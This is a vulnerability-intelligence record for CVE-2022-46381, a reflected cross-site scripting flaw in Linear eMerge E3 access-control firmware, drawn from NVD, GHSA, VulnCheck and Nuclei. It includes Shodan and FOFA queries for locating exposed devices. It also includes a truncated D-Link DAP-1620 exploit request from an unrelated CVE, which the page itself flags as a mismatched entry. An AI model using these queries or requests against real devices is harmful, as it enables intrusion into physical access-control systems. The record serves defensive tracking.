CVE-2022-46381
Published: 2022-12-13
Priority: P2 · 79 · Medium · CVSS 3.1 base score 6.1
Vector: AV:N / AC:L / PR:N / UI:R / S:C / C:L / I:L / A:N
Flags: ITW · Exploit · VulnCheck KEV
Exploited in the wild
EPSS: 1.74% (74.9th percentile)
Certain Linear eMerge E3-Series devices are vulnerable to XSS via the type parameter (e.g., to the badging/badge_template_v0.php component). This affects 0.32-08f, 0.32-07p, 0.32-07e, 0.32-09c, 0.32-09b, 0.32-09a, and 0.32-08e.
Affected (7 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| niceforyou | linear_emerge_e3_access_control_firmware | — | — |
| niceforyou | linear_emerge_e3_access_control_firmware | — | — |
| niceforyou | linear_emerge_e3_access_control_firmware | — | — |
| niceforyou | linear_emerge_e3_access_control_firmware | — | — |
| niceforyou | linear_emerge_e3_access_control_firmware | — | — |
| niceforyou | linear_emerge_e3_access_control_firmware | — | — |
| niceforyou | linear_emerge_e3_access_control_firmware | — | — |
Detection & IOCs (extracted from sources)
- Shodan query to identify exposed Linear eMerge devices: search for http.html containing 'Linear eMerge' or 'linear emerge'
- FOFA query to identify exposed Linear eMerge devices: body contains 'linear emerge'
- Attacker goal is cookie theft for session hijacking; monitor for exfiltration of cookie-based authentication credentials following XSS exploitation
- Vulnerability affects only specific firmware versions; unaffected versions will not be exploitable
- This is a reflected XSS (UI:R), meaning exploitation requires user interaction: a victim must click a crafted link; it is not a stored or self-triggering vulnerability
CVSS provenance
- NVD (v3.1): 6.1 MEDIUM, CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
- VulnCheck: 6.1 MEDIUM
GHSA
GHSA-wwh4-qv5c-5223 · ghsa_unreviewed · 2022-12-14 · CVE-2022-46381 [MEDIUM] · CWE-79
Certain Linear eMerge E3-Series devices are vulnerable to XSS via the type parameter (e.g., to the badging/badge_template_v0.php component). This affects 0.32-08f, 0.32-07p, 0.32-07e, 0.32-09c, 0.32-09b, 0.32-09a, and 0.32-08e.
VulnCheck
niceforyou linear_emerge_e3_access_control_firmware · vulncheck · 2022 · CVSS 6.1 · CVE-2022-46381 [MEDIUM]
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Certain Linear eMerge E3-Series devices are vulnerable to XSS via the type parameter (e.g., to the badging/badge_template_v0.php component). This affects 0.32-08f, 0.32-07p, 0.32-07e, 0.32-09c, 0.32-09b, 0.32-09a, and 0.32-08e.
Affected: niceforyou linear_emerge_e3_access_control_firmware
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-11-26&host_type=src&vulnerability=cve-2022-46381; https://dashboard.shadowserver.org/statistics/honeypot/
No detection rules found.
Exploit-DB
DLINK DAP-1620 A1 v1.01 - Directory Traversal · exploitdb · 2022-05-11 · CVSS 7.5 · CVE-2021-46381 [HIGH]
Note that this Exploit-DB entry is indexed under CVE-2021-46381 (a D-Link DAP-1620 directory traversal), not CVE-2022-46381; it appears here as a similarly numbered match and is unrelated to the Linear eMerge XSS.
---
```text
# Exploit Title: DLINK DAP-1620 A1 v1.01 - Directory Traversal
# Date: 27/4/2022
# Exploit Author: Momen Eldawakhly (Cyber Guy)
# Vendor Homepage: https://me.dlink.com/consumer
# Version: DAP-1620 - A1 v1.01
# Tested on: Linux
# CVE : CVE-2021-46381

POST /apply.cgi HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: http://84.217.16.220/
Cookie: ID=634855649
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Content-Length: 281
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4512.0 Safari/537.36
Host: 84.217.16.220
Connection: Keep-alive

action=do_graph_auth&graph_code=94102&html_response_message=just_login&html_r
```
Nuclei
Linear eMerge E3-Series - Cross-Site Scripting · nuclei · CVSS 6.1 · CVE-2022-46381 [MEDIUM]
Linear eMerge E3-Series devices contain a cross-site scripting vulnerability via the type parameter, e.g., to the badging/badge_template_v0.php component. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site and thus steal cookie-based authentication credentials and launch other attacks. This affects versions 0.32-08f, 0.32-07p, 0.32-07e, 0.32-09c, 0.32-09b, 0.32-09a, and 0.32-08e.
Template (info block only; the request and matcher sections were not included in the source):
```yaml
id: CVE-2022-46381

info:
  name: Linear eMerge E3-Series - Cross-Site Scripting
  author: arafatansari
  severity: medium
  description: |
    Linear eMerge E3-Series devices contain a cross-site scripting vulnerability via the type parameter, e.g., to the badging/badge_template_v0.php component. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site and thus steal cookie-based authentication credentials and launch other attacks. This affects versions 0.32-08f, 0.32-07p, 0.32-07e, 0.32-09c, 0.32-09b, 0.32-09a, and 0.32-08e.
```